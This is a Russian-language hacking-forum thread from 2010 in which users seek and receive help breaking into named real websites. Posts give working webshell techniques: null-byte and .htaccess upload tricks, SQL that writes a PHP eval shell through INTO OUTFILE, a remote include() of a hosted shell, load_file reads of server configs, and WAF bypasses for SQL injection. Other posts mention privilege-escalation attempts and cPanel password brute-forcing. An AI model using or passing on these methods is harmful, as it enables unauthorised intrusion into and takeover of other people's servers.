Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    461
    Likes Received:
    62
    Reputations:
    26
    Ты скулю то покажи : O
     
  2. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    Вот, не так давно выкладывал скрипт, дампит таблицы через limit в ошибке (MySQL 4.1>=)
    https://forum.antichat.ru/showthread.php?p=2352621#post2352621
    Заточить под себя не сложно.
     
    #15082 h00lyshit!, 14 Oct 2010
    Last edited: 14 Oct 2010
    1 person likes this.
  3. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    461
    Likes Received:
    62
    Reputations:
    26
    Всмысле подменить?) где именно?)
    Если можеш, обьясни плз подробнее.
     
  4. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    https://forum.antichat.ru/showthread.php?p=2344055#post2344055
     
    #15084 h00lyshit!, 14 Oct 2010
    Last edited: 14 Oct 2010
  5. madmg

    madmg New Member

    Joined:
    9 Jan 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    всем привет у менеа ести маленкая проблема, саит такои _quanttest.ro, ести доступ к cpanel и через ftp, тут все панятно, но у саита ести 2-я части, если залогинится пасылают вас на саит >>> network.quanttest.ro, из cpanel доступa к нему нету (из ошиблки видно што он находитця в другой директорие на серваке /home/fnet а другои в папке /home/qt) мне к нему надобы подобратсеа. sql ести но запрос я подобрати не как не магу.
    отпешитеси y каво какие идеи ести.
    еа писал на форуме но, ребеата вличку не отзиваиутсеа, админи стеорли мои пост... :), наверное сылаияси на то что я занимаиуси смапамам или из за отсуствие постов.


    PS shh не фурычит, залил phpshell, начил искати подход к root, exploit на linux 2.6.18, apache 2.2.16 но безрезультатно.
    PSS на даном моменте работает брут на для спанел на базе perl, но результат мало вероятнии пароли 13-и значние, всеотаки админ не полнии ламер
     
  6. zolter

    zolter New Member

    Joined:
    10 Oct 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Народ, помогите с http://parus-grad.com.ua/SearchResult.html?ot=(select+test) плиз. Как добраться до списка таблиц?
     
  7. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    461
    Likes Received:
    62
    Reputations:
    26
    Вообщем получилось залить шелл вот так shell.php.jpg
    Вопрос как выполнить этот файл? при заходе на этот файл появляется картинка на которой нарисованна ссылка к шеллу : O
    ---------
    https://www.enzymedica.com/images/products/39_win4.php.gif
    https://www.enzymedica.com/images/products/39_win4.php.swf
    https://www.enzymedica.com/images/products/39_win2.php%2500.jpg
    help
     
    #15087 GroM88, 14 Oct 2010
    Last edited: 14 Oct 2010
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    а ты чего ожидал? у тебя конечный формат-картинка
    такое прокатит очень редко, если хтаксесс настроенo неправильно
     
    _________________________
    1 person likes this.
  9. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    Ищи инклуд и инклудь шелл.
    Пытайся залить свой .htaccess и пропиши исполнение jpg файлов (AddHandler application/x-httpd-php .jpg)
    Если файл проходит через функцию copy(), при заливке прокатит нулл байт (shell.php%00.jpg), расширение обрежется и ты получишь полноценный шелл.

    П.С. Ты будешь теперь каждое действие спрашивать? Проще было написать, я ничего не знаю, дайте мне ссылку на залитый шелл.
     
    #15089 h00lyshit!, 14 Oct 2010
    Last edited: 15 Oct 2010
    1 person likes this.
  10. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    79
    Likes Received:
    36
    Reputations:
    14
    что за шляпа???шелл литься не хочет

    p.s какие есть способы залития шелла в phpmyadmin?????
    и что можно сделать имея доступ в phpmyadmin? :confused:
     
    #15090 KENT1994, 15 Oct 2010
    Last edited: 15 Oct 2010
  11. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    CREATE DATABASE `shell_upload`;
    CREATE TABLE `hack` (`shell` TEXT);
    INSERT INTO `hack` (`shell`) VALUES ('<?php eval($_GET[c]); ?>');
    Ищем папку с правами на запись и делаем запрос
    SELECT `shell` FROM `hack` INTO OUTFILE '/path/shell.php';

    Либо можно инклудить шелл с сервера.
    INSERT INTO `hack` (`shell`) VALUES ("<?php include('http://сайт с шеллом'); ?>");

    Для этого способа, директива allow_url_include должна находиться в положении On.
     
    #15091 h00lyshit!, 15 Oct 2010
    Last edited: 15 Oct 2010
  12. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    79
    Likes Received:
    36
    Reputations:
    14
    где ее найти?? :confused:и можно ли ее включить?
     
  13. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    Найти ее можно вызвав phpinfo или посмотреть в файле php.ini
    А чем тебя первый способ не устроил?
     
  14. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    79
    Likes Received:
    36
    Reputations:
    14
    вроде залил , но теперь хз где :mad: искать
    сделал так ---> INSERT INTO `hack` (`shell`) VALUES ("<?php include('http://сайт с шеллом'); ?>");

    где теперь найти на сайте этот шелл(
     
    #15094 KENT1994, 15 Oct 2010
    Last edited: 15 Oct 2010
  15. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    Когда льешь через into outfile, ты должен указать абсолютный путь до папки с правами на запись, там и ищи.
    Лучше лей через eval, так как allow_url_include, достаточно редко бывает в положении On.
     
    #15095 h00lyshit!, 15 Oct 2010
    Last edited: 15 Oct 2010
  16. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    79
    Likes Received:
    36
    Reputations:
    14
    SELECT shell FROM `SS_id` INTO OUTFILE '/images/shell.php'; так?

    я просто хз как найти папку для залива файлов :( шел во 2й раз заливаю
     
    #15096 KENT1994, 15 Oct 2010
    Last edited: 15 Oct 2010
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    Ну я не знаю какой у тебя путь, это тебе виднее. Если ты это прописал рандомом, то вероятно не так.
    А если ты прочитал конфиги через load_file или нашел раскрытие путей, то так.

    У тебя вообще права есть на чтение и запись файлов?
    Что то я уже начал сомневаться, судя по ошибке, что ты выложил, а потом удалил.

    Сделай запрос в phpmyadmin

    HTML:
    SELECT user() FROM mysql.user
    выдаст тебе юзера, под которым работает БД

    Потом сделай запрос

    HTML:
     SELECT file_priv FROM mysql.user WHERE user = 'имя юзера'
    Если получишь Y, значит права есть. Следовательно, ты можешь читать файлы через load_file() и писать в них, дальше попробуй прочитать конфиги сервера.

    HTML:
    SELECT load_file('/etc/apache2/httpd.conf')
    и тд, там ты найдешь путь.

    Стандартные пути для файлов конфигурации, ты можешь найти по ссылке https://forum.antichat.ru/thread49775-Default.html
    Либо ищи раскрытие путей.
    Некоторые варианты, как это можно сделать описаны мной вот тут https://forum.antichat.ru/showpost.php?p=2324984&postcount=4

    Какая вообще твоя цель? Шелл залить? Ты можешь достать из базы акк админа и попробывать залить через админку. Как это сделать обсуждалось выше.
     
    #15097 h00lyshit!, 15 Oct 2010
    Last edited: 15 Oct 2010
    1 person likes this.
  18. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    79
    Likes Received:
    36
    Reputations:
    14
    сенкс за урок, после техникума домучаюсь
     
    #15098 KENT1994, 15 Oct 2010
    Last edited: 15 Oct 2010
  19. nullik

    nullik Member

    Joined:
    26 Feb 2010
    Messages:
    116
    Likes Received:
    44
    Reputations:
    1
    Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает.
    union(SELECT+1,table_name,3,4,5)from(iNformation_schema.tabl%00es) Вот так не работает.
    union(SELECT+1,version(),3,4,5) так работает.
    Посоветуйте что-либо плиз.
    Спасибо.
     
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Попробуй:

    1 - /*!запрос*/
    2 - использовать метод POST
     
    2 people like this.
Loading...
Thread Status:
Not open for further replies.